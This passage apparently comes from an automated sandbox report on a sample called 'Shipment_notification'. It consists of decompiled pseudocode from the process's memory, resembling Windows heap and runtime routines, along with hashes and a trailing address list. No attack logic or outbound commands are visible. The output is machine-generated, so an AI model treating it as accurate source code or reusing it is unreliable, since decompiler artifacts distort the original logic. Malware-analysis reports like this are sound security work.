                                                                                					_v20 = _t33;
                                                                                					_t54 =  *(_t33 + 4);
                                                                                					if((_t51 | _t54) == 0) {
                                                                                						_t37 = L01B15E50(0x1ac67cc, 0, 0,  &_v12);
                                                                                						if(_t37 != 0) {
                                                                                							goto L6;
                                                                                						}
                                                                                						_t52 = _v8;
                                                                                						asm("lock cmpxchg8b [esi]");
                                                                                						_t64 = _v16;
                                                                                						_t49 = _t37;
                                                                                						_v20 = 0;
                                                                                						if(_t37 == 0) {
                                                                                							if(_t64 != 0) {
                                                                                								 *_t64 = _v12;
                                                                                								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                                                							}
                                                                                							E01BB9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                                                							_t31 = 1;
                                                                                							goto L7;
                                                                                						}
                                                                                						E01AEF7C0(_t52, _v12, _t52, 0);
                                                                                						if(_t64 != 0) {
                                                                                							 *_t64 = _t49;
                                                                                							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                                                						}
                                                                                						L12:
                                                                                						_t31 = 1;
                                                                                						goto L7;
                                                                                					}
                                                                                					if(_t61 != 0) {
                                                                                						 *_t61 = _t51;
                                                                                						_t61[1] = _t54;
                                                                                					}
                                                                                					goto L12;
                                                                                				} else {
                                                                                					goto L6;
                                                                                				}
                                                                                			}


                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • Opcode ID: d049a4ea7eb7d0b3cce35b5469f918114cce68288edb20b9f0b1535f1bc856dc
                                                                                • Instruction ID: 0249d78eea6985729ee1296d6a888f193d259c4b8ff30ebef2cd17fb8a341e1c
                                                                                • Opcode Fuzzy Hash: d049a4ea7eb7d0b3cce35b5469f918114cce68288edb20b9f0b1535f1bc856dc
                                                                                • Instruction Fuzzy Hash: 97318F716057019FE368CF1DC940B26BBE5FB88B00F9549ADF99897351EBB0D804CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E01AEAA16(signed short* __ecx) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v12;
                                                                                				signed short _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed short _v24;
                                                                                				signed short _v28;
                                                                                				void* _v32;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr _t25;
                                                                                				signed short _t38;
                                                                                				signed short* _t42;
                                                                                				signed int _t44;
                                                                                				signed short* _t52;
                                                                                				signed short _t53;
                                                                                				signed int _t54;
                                                                                
                                                                                				_v8 =  *0x1bdd360 ^ _t54;
                                                                                				_t42 = __ecx;
                                                                                				_t44 =  *__ecx & 0x0000ffff;
                                                                                				_t52 =  &(__ecx[2]);
                                                                                				_t51 = _t44 + 2;
                                                                                				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                                                					L4:
                                                                                					_t25 =  *0x1bd7b9c; // 0x0
                                                                                					_t53 = L01B04620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                                                					__eflags = _t53;
                                                                                					if(_t53 == 0) {
                                                                                						L3:
                                                                                						return L01B2B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                                                					} else {
                                                                                						E01B2F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                                                						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                						L2:
                                                                                						_t51 = 4;
                                                                                						if(L01AF6C59(_t53, _t51, _t58) != 0) {
                                                                                							_t28 = L01B15E50(0x1acc338, 0, 0,  &_v32);
                                                                                							__eflags = _t28;
                                                                                							if(_t28 == 0) {
                                                                                								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                                                								__eflags = _t38;
                                                                                								_v24 = _t53;
                                                                                								_v16 = _t38;
                                                                                								_v20 = 0;
                                                                                								_v12 = 0;
                                                                                								E01B1B230(_v32, _v28, 0x1acc2d8, 1,  &_v24);
                                                                                								_t28 = E01AEF7A0(_v32, _v28);
                                                                                							}
                                                                                							__eflags = _t53 -  *_t52;
                                                                                							if(_t53 !=  *_t52) {
                                                                                								_t28 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                							}
                                                                                						}
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				_t53 =  *_t52;
                                                                                				_t44 = _t44 >> 1;
                                                                                				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                                                				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                                                					goto L4;
                                                                                				}
                                                                                				goto L2;
                                                                                			}





















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e3a7cfb34c9db18afb85a7728dae0146a089f0a44c0677a24742390c6e1ba505
                                                                                • Instruction ID: 23e7dc51496d11233a9401187498fc755445a0fb508403e3189d81c1d055afc4
                                                                                • Opcode Fuzzy Hash: e3a7cfb34c9db18afb85a7728dae0146a089f0a44c0677a24742390c6e1ba505
                                                                                • Instruction Fuzzy Hash: 8D31E571A00619ABCF199FA8CE81A7FB7B9FF44700F0144ADF905D7140EB349911D7A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E01B24A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				signed int* _v12;
                                                                                				char _v13;
                                                                                				signed int _v16;
                                                                                				char _v21;
                                                                                				signed int* _v24;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t29;
                                                                                				signed int* _t32;
                                                                                				signed int* _t41;
                                                                                				signed int _t42;
                                                                                				void* _t43;
                                                                                				intOrPtr* _t51;
                                                                                				void* _t52;
                                                                                				signed int _t53;
                                                                                				signed int _t58;
                                                                                				void* _t59;
                                                                                				signed int _t60;
                                                                                				signed int _t62;
                                                                                
                                                                                				_t49 = __edx;
                                                                                				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                                                				_t26 =  *0x1bdd360 ^ _t62;
                                                                                				_v8 =  *0x1bdd360 ^ _t62;
                                                                                				_t41 = __ecx;
                                                                                				_t51 = __edx;
                                                                                				_v12 = __ecx;
                                                                                				if(_a4 == 0) {
                                                                                					if(_a8 != 0) {
                                                                                						goto L1;
                                                                                					}
                                                                                					_v13 = 1;
                                                                                					E01B02280(_t26, 0x1bd8608);
                                                                                					_t58 =  *_t41;
                                                                                					if(_t58 == 0) {
                                                                                						L11:
                                                                                						E01AFFFB0(_t41, _t51, 0x1bd8608);
                                                                                						L2:
                                                                                						 *0x1bdb1e0(_a4, _a8);
                                                                                						_t42 =  *_t51();
                                                                                						if(_t42 == 0) {
                                                                                							_t29 = 0;
                                                                                							L5:
                                                                                							_pop(_t52);
                                                                                							_pop(_t59);
                                                                                							_pop(_t43);
                                                                                							return L01B2B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                                                						}
                                                                                						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                                                						if(_v21 != 0) {
                                                                                							_t53 = 0;
                                                                                							E01B02280(_t28, 0x1bd8608);
                                                                                							_t32 = _v24;
                                                                                							if( *_t32 == _t58) {
                                                                                								 *_t32 = _t42;
                                                                                								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                                                								if(_t58 != 0) {
                                                                                									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                                                									asm("sbb edi, edi");
                                                                                									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                                                								}
                                                                                							}
                                                                                							E01AFFFB0(_t42, _t53, 0x1bd8608);
                                                                                							if(_t53 != 0) {
                                                                                								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                                							}
                                                                                						}
                                                                                						_t29 = _t42;
                                                                                						goto L5;
                                                                                					}
                                                                                					if( *((char*)(_t58 + 0x40)) != 0) {
                                                                                						L10:
                                                                                						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                                                						E01AFFFB0(_t41, _t51, 0x1bd8608);
                                                                                						_t29 = _t58;
                                                                                						goto L5;
                                                                                					}
                                                                                					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                						goto L11;
                                                                                					}
                                                                                					goto L10;
                                                                                				}
                                                                                				L1:
                                                                                				_v13 = 0;
                                                                                				_t58 = 0;
                                                                                				goto L2;
                                                                                			}

























                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 467386bfb9b4af948b2b24ee1bb0d190dd86cae9a0b7e98ed0ad9fcd1dffdd74
                                                                                • Instruction ID: 3c93274edf2c967e18336fa4c3307232b28ba6aca07a540120712f8037d0d38b
                                                                                • Opcode Fuzzy Hash: 467386bfb9b4af948b2b24ee1bb0d190dd86cae9a0b7e98ed0ad9fcd1dffdd74
                                                                                • Instruction Fuzzy Hash: F031E2322066619BC72A9F59C984B2AFBA4FF82710F0045EDF95A4BA51DB70D808CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 74%
                                                                                			E01B1E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                                                				intOrPtr* _v0;
                                                                                				signed char _v4;
                                                                                				signed int _v8;
                                                                                				void* __ecx;
                                                                                				void* __ebp;
                                                                                				void* _t37;
                                                                                				intOrPtr _t38;
                                                                                				signed int _t44;
                                                                                				signed char _t52;
                                                                                				void* _t54;
                                                                                				intOrPtr* _t56;
                                                                                				void* _t58;
                                                                                				char* _t59;
                                                                                				signed int _t62;
                                                                                
                                                                                				_t58 = __edx;
                                                                                				_push(0);
                                                                                				_push(4);
                                                                                				_push( &_v8);
                                                                                				_push(0x24);
                                                                                				_push(0xffffffff);
                                                                                				if(L01B29670() < 0) {
                                                                                					L01B3DF30(_t54, _t58, _t35);
                                                                                					asm("int3");
                                                                                					asm("int3");
                                                                                					asm("int3");
                                                                                					asm("int3");
                                                                                					asm("int3");
                                                                                					asm("int3");
                                                                                					_push(_t54);
                                                                                					_t52 = _v4;
                                                                                					if(_t52 > 8) {
                                                                                						_t37 = 0xc0000078;
                                                                                					} else {
                                                                                						_t38 =  *0x1bd7b9c; // 0x0
                                                                                						_t62 = _t52 & 0x000000ff;
                                                                                						_t59 = L01B04620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                                                						if(_t59 == 0) {
                                                                                							_t37 = 0xc0000017;
                                                                                						} else {
                                                                                							_t56 = _v0;
                                                                                							 *(_t59 + 1) = _t52;
                                                                                							 *_t59 = 1;
                                                                                							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                                                							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                                                							_t44 = _t62 - 1;
                                                                                							if(_t44 <= 7) {
                                                                                								switch( *((intOrPtr*)(_t44 * 4 +  &M01B1E810))) {
                                                                                									case 0:
                                                                                										L6:
                                                                                										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                                                										goto L7;
                                                                                									case 1:
                                                                                										L13:
                                                                                										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                                                										goto L6;
                                                                                									case 2:
                                                                                										L12:
                                                                                										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                                                										goto L13;
                                                                                									case 3:
                                                                                										L11:
                                                                                										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                                                										goto L12;
                                                                                									case 4:
                                                                                										L10:
                                                                                										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                                                										goto L11;
                                                                                									case 5:
                                                                                										L9:
                                                                                										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                                                										goto L10;
                                                                                									case 6:
                                                                                										L17:
                                                                                										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                                                										goto L9;
                                                                                									case 7:
                                                                                										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                                                										goto L17;
                                                                                								}
                                                                                							}
                                                                                							L7:
                                                                                							 *_a40 = _t59;
                                                                                							_t37 = 0;
                                                                                						}
                                                                                					}
                                                                                					return _t37;
                                                                                				} else {
                                                                                					_push(0x20);
                                                                                					asm("ror eax, cl");
                                                                                					return _a4 ^ _v8;
                                                                                				}
                                                                                			}


















                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3dfdd7fb69461e35e72612c6e8c751b55ad467d2ccdb19a4a00e1ea99c479e33
                                                                                • Instruction ID: 0a8323084c682836a910c9eb6c7626d040646698309dfdb3e1d772e5edf1064f
                                                                                • Opcode Fuzzy Hash: 3dfdd7fb69461e35e72612c6e8c751b55ad467d2ccdb19a4a00e1ea99c479e33
                                                                                • Instruction Fuzzy Hash: D6318E75A14249EFE749CF58D841B96BBE4FB08314F5582A6FD08CB341D731E890CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E01B1BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr* _t41;
                                                                                				intOrPtr _t51;
                                                                                
                                                                                				_t51 =  *0x1bd6100; // 0x5
                                                                                				_v12 = __edx;
                                                                                				_v8 = __ecx;
                                                                                				if(_t51 >= 0x800) {
                                                                                					L12:
                                                                                					return 0;
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				while(1) {
                                                                                					L1:
                                                                                					_t22 = _t51;
                                                                                					asm("lock cmpxchg [ecx], edx");
                                                                                					if(_t51 == _t22) {
                                                                                						break;
                                                                                					}
                                                                                					_t51 = _t22;
                                                                                					if(_t22 < 0x800) {
                                                                                						continue;
                                                                                					}
                                                                                					goto L12;
                                                                                				}
                                                                                				E01B02280(0xd, 0x8b2f1a0);
                                                                                				_t41 =  *0x1bd60f8; // 0x0
                                                                                				if(_t41 != 0) {
                                                                                					 *0x1bd60f8 =  *_t41;
                                                                                					 *0x1bd60fc =  *0x1bd60fc + 0xffff;
                                                                                				}
                                                                                				E01AFFFB0(_t41, 0x800, 0x8b2f1a0);
                                                                                				if(_t41 != 0) {
                                                                                					L6:
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                                                					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                                                					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                                                					do {
                                                                                						asm("lock xadd [0x1bd60f0], ax");
                                                                                						 *((short*)(_t41 + 0x34)) = 1;
                                                                                					} while (1 == 0);
                                                                                					goto L8;
                                                                                				} else {
                                                                                					_t41 = L01B04620(0x1bd6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                                                					if(_t41 == 0) {
                                                                                						L11:
                                                                                						asm("lock dec dword [0x1bd6100]");
                                                                                						L8:
                                                                                						return _t41;
                                                                                					}
                                                                                					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                                                					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                                                					if(_t41 == 0) {
                                                                                						goto L11;
                                                                                					}
                                                                                					goto L6;
                                                                                				}
                                                                                			}











                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46d75ae6170a27282c66a5db2f7bd29729fbe2dbc49fa1760277218adfdf798d
                                                                                • Instruction ID: 4856e323773ead966b72bd2a84d99e23c7b5d0c6527ffd59309538e513fb4b8c
                                                                                • Opcode Fuzzy Hash: 46d75ae6170a27282c66a5db2f7bd29729fbe2dbc49fa1760277218adfdf798d
                                                                                • Instruction Fuzzy Hash: 0E310132A026069BCB1ADF98C5C0BA677B4FB18310F8601F8ED04DB209F734D9058B80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 60%
                                                                                			E01B11DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                				char _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr* _v20;
                                                                                				void* _t22;
                                                                                				char _t23;
                                                                                				void* _t36;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t43;
                                                                                
                                                                                				_v12 = __ecx;
                                                                                				_t43 = 0;
                                                                                				_v20 = __edx;
                                                                                				_t42 =  *__edx;
                                                                                				 *__edx = 0;
                                                                                				_v16 = _t42;
                                                                                				_push( &_v8);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(6);
                                                                                				_push(0);
                                                                                				_push(__ecx);
                                                                                				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                                                				_push(_t36);
                                                                                				_t22 = E01B0F460();
                                                                                				if(_t22 < 0) {
                                                                                					if(_t22 == 0xc0000023) {
                                                                                						goto L1;
                                                                                					}
                                                                                					L3:
                                                                                					return _t43;
                                                                                				}
                                                                                				L1:
                                                                                				_t23 = _v8;
                                                                                				if(_t23 != 0) {
                                                                                					_t38 = _a4;
                                                                                					if(_t23 >  *_a4) {
                                                                                						_t42 = L01B04620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                                                						if(_t42 == 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						_t23 = _v8;
                                                                                					}
                                                                                					_push( &_v8);
                                                                                					_push(_t23);
                                                                                					_push(_t42);
                                                                                					_push(6);
                                                                                					_push(_t43);
                                                                                					_push(_v12);
                                                                                					_push(_t36);
                                                                                					if(E01B0F460() < 0) {
                                                                                						if(_t42 != 0 && _t42 != _v16) {
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                                                						}
                                                                                						goto L3;
                                                                                					}
                                                                                					 *_v20 = _t42;
                                                                                					 *_a4 = _v8;
                                                                                				}
                                                                                				_t43 = 1;
                                                                                				goto L3;
                                                                                			}













                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                • Instruction ID: 19aac1eb04749f0b8fb6a11c4662d0c2b775ad978741d6eb9250613a3af54a57
                                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                • Instruction Fuzzy Hash: 26217F72600119EFD729CFADCC80EAABBBDEF85680F564195EA0597250D734AE01C7A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E01AE9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                                				signed int _t53;
                                                                                				signed int _t56;
                                                                                				signed int* _t60;
                                                                                				signed int _t63;
                                                                                				signed int _t66;
                                                                                				signed int _t69;
                                                                                				void* _t70;
                                                                                				intOrPtr* _t72;
                                                                                				void* _t78;
                                                                                				void* _t79;
                                                                                				signed int _t80;
                                                                                				intOrPtr _t82;
                                                                                				void* _t85;
                                                                                				void* _t88;
                                                                                				void* _t89;
                                                                                
                                                                                				_t84 = __esi;
                                                                                				_t70 = __ecx;
                                                                                				_t68 = __ebx;
                                                                                				_push(0x2c);
                                                                                				_push(0x1bbf6e8);
                                                                                				E01B3D0E8(__ebx, __edi, __esi);
                                                                                				 *((char*)(_t85 - 0x1d)) = 0;
                                                                                				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                				if(_t82 == 0) {
                                                                                					L4:
                                                                                					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                                						E01BB88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                                					}
                                                                                					L5:
                                                                                					return E01B3D130(_t68, _t82, _t84);
                                                                                				}
                                                                                				_t88 = _t82 -  *0x1bd86c0; // 0x15807b0
                                                                                				if(_t88 == 0) {
                                                                                					goto L4;
                                                                                				}
                                                                                				_t89 = _t82 -  *0x1bd86b8; // 0x0
                                                                                				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                					goto L4;
                                                                                				} else {
                                                                                					E01B02280(_t82 + 0xe0, _t82 + 0xe0);
                                                                                					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                                					__eflags =  *((char*)(_t82 + 0xe5));
                                                                                					if(__eflags != 0) {
                                                                                						E01BB88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                                						goto L12;
                                                                                					} else {
                                                                                						__eflags =  *((char*)(_t82 + 0xe4));
                                                                                						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                                							 *((char*)(_t82 + 0xe4)) = 1;
                                                                                							_push(_t82);
                                                                                							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                                							E01B2AFD0();
                                                                                						}
                                                                                						while(1) {
                                                                                							_t60 = _t82 + 8;
                                                                                							 *(_t85 - 0x2c) = _t60;
                                                                                							_t68 =  *_t60;
                                                                                							_t80 = _t60[1];
                                                                                							 *(_t85 - 0x28) = _t68;
                                                                                							 *(_t85 - 0x24) = _t80;
                                                                                							while(1) {
                                                                                								L10:
                                                                                								__eflags = _t80;
                                                                                								if(_t80 == 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t84 = _t68;
                                                                                								 *(_t85 - 0x30) = _t80;
                                                                                								 *(_t85 - 0x24) = _t80 - 1;
                                                                                								asm("lock cmpxchg8b [edi]");
                                                                                								_t68 = _t84;
                                                                                								 *(_t85 - 0x28) = _t68;
                                                                                								 *(_t85 - 0x24) = _t80;
                                                                                								__eflags = _t68 - _t84;
                                                                                								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                								if(_t68 != _t84) {
                                                                                									continue;
                                                                                								}
                                                                                								__eflags = _t80 -  *(_t85 - 0x30);
                                                                                								if(_t80 !=  *(_t85 - 0x30)) {
                                                                                									continue;
                                                                                								}
                                                                                								__eflags = _t80;
                                                                                								if(_t80 == 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t63 = 0;
                                                                                								 *(_t85 - 0x34) = 0;
                                                                                								_t84 = 0;
                                                                                								__eflags = 0;
                                                                                								while(1) {
                                                                                									 *(_t85 - 0x3c) = _t84;
                                                                                									__eflags = _t84 - 3;
                                                                                									if(_t84 >= 3) {
                                                                                										break;
                                                                                									}
                                                                                									__eflags = _t63;
                                                                                									if(_t63 != 0) {
                                                                                										L40:
                                                                                										_t84 =  *_t63;
                                                                                										__eflags = _t84;
                                                                                										if(_t84 != 0) {
                                                                                											_t84 =  *(_t84 + 4);
                                                                                											__eflags = _t84;
                                                                                											if(_t84 != 0) {
                                                                                												 *0x1bdb1e0(_t63, _t82);
                                                                                												 *_t84();
                                                                                											}
                                                                                										}
                                                                                										do {
                                                                                											_t60 = _t82 + 8;
                                                                                											 *(_t85 - 0x2c) = _t60;
                                                                                											_t68 =  *_t60;
                                                                                											_t80 = _t60[1];
                                                                                											 *(_t85 - 0x28) = _t68;
                                                                                											 *(_t85 - 0x24) = _t80;
                                                                                											goto L10;
                                                                                										} while (_t63 == 0);
                                                                                										goto L40;
                                                                                									}
                                                                                									_t69 = 0;
                                                                                									__eflags = 0;
                                                                                									while(1) {
                                                                                										 *(_t85 - 0x38) = _t69;
                                                                                										__eflags = _t69 -  *0x1bd84c0;
                                                                                										if(_t69 >=  *0x1bd84c0) {
                                                                                											break;
                                                                                										}
                                                                                										__eflags = _t63;
                                                                                										if(_t63 != 0) {
                                                                                											break;
                                                                                										}
                                                                                										_t66 = E01BB9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                                										__eflags = _t66;
                                                                                										if(_t66 == 0) {
                                                                                											_t63 = 0;
                                                                                											__eflags = 0;
                                                                                										} else {
                                                                                											_t63 = _t66 + 0xfffffff4;
                                                                                										}
                                                                                										 *(_t85 - 0x34) = _t63;
                                                                                										_t69 = _t69 + 1;
                                                                                									}
                                                                                									_t84 = _t84 + 1;
                                                                                								}
                                                                                								__eflags = _t63;
                                                                                							}
                                                                                							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                                							 *((char*)(_t82 + 0xe5)) = 1;
                                                                                							 *((char*)(_t85 - 0x1d)) = 1;
                                                                                							L12:
                                                                                							 *(_t85 - 4) = 0xfffffffe;
                                                                                							E01AE922A(_t82);
                                                                                							_t53 = E01B07D50();
                                                                                							__eflags = _t53;
                                                                                							if(_t53 != 0) {
                                                                                								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                							} else {
                                                                                								_t56 = 0x7ffe0386;
                                                                                							}
                                                                                							__eflags =  *_t56;
                                                                                							if( *_t56 != 0) {
                                                                                								_t56 = E01BB8B58(_t82);
                                                                                							}
                                                                                							__eflags =  *((char*)(_t85 - 0x1d));
                                                                                							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                                								__eflags = _t82 -  *0x1bd86c0; // 0x15807b0
                                                                                								if(__eflags != 0) {
                                                                                									__eflags = _t82 -  *0x1bd86b8; // 0x0
                                                                                									if(__eflags == 0) {
                                                                                										_t79 = 0x1bd86bc;
                                                                                										_t72 = 0x1bd86b8;
                                                                                										goto L18;
                                                                                									}
                                                                                									__eflags = _t56 | 0xffffffff;
                                                                                									asm("lock xadd [edi], eax");
                                                                                									if(__eflags == 0) {
                                                                                										E01AE9240(_t68, _t82, _t82, _t84, __eflags);
                                                                                									}
                                                                                								} else {
                                                                                									_t79 = 0x1bd86c4;
                                                                                									_t72 = 0x1bd86c0;
                                                                                									L18:
                                                                                									E01B19B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                                								}
                                                                                							}
                                                                                							goto L5;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}


















                                                                                0x00000000
                                                                                0x01b43757
                                                                                0x01b43759
                                                                                0x01b4375c
                                                                                0x01b4375c
                                                                                0x01b4375e
                                                                                0x01b4375e
                                                                                0x01b43761
                                                                                0x01b43764
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43766
                                                                                0x01b43768
                                                                                0x01b437a3
                                                                                0x01b437a3
                                                                                0x01b437a5
                                                                                0x01b437a7
                                                                                0x01b437ad
                                                                                0x01b437b0
                                                                                0x01b437b2
                                                                                0x01b437bc
                                                                                0x01b437c2
                                                                                0x01b437c2
                                                                                0x01b437b2
                                                                                0x01ae9187
                                                                                0x01ae9187
                                                                                0x01ae918a
                                                                                0x01ae918d
                                                                                0x01ae918f
                                                                                0x01ae9192
                                                                                0x01ae9195
                                                                                0x00000000
                                                                                0x01ae9195
                                                                                0x00000000
                                                                                0x01ae9187
                                                                                0x01b4376a
                                                                                0x01b4376a
                                                                                0x01b4376c
                                                                                0x01b4376c
                                                                                0x01b4376f
                                                                                0x01b43775
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43777
